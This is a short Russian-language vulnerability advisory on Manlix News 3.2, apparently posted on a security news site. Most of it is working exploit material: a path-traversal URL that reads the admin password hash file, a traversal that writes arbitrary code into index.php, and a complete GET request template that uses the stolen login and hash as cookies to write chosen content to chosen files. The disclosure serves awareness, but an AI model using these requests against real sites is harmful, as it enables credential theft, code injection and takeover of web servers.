Программа: Manlix News 3.2 

Несколько уязвимостей в Mantix news позволяют удаленному пользователю просматривать произвольные файлы на сервере, изменять произвольные локальные файлы и получить административный доступ к приложению. 

1. Просмотр произвольных файлов на сервере: 

http://127.0.0.1/index?news_section= ../admins.inc.dat - получаем хеш пароля админа.

2. Изменение локальных файлов (в системе
администрирования):

http://127.0.0.1/admin.php?section= 0_0¤t_section=../../index.php - добавление в файл index.php произвольного кода 

3. Возможность получения доступа к системе
администрирования по хешу и логину. 

GET /admin.php?section=0_0¤t_section=[куда пишем]&day=01&month=01&year=2004&
hour=03&minute=00&second=00&news=[что пишем] &add_news=ok HTTP/1.1
Host: [хост]
Cookie: manlix_news_login=[логин]; manlix_news_password=[хеш пароля]

Оставить мнение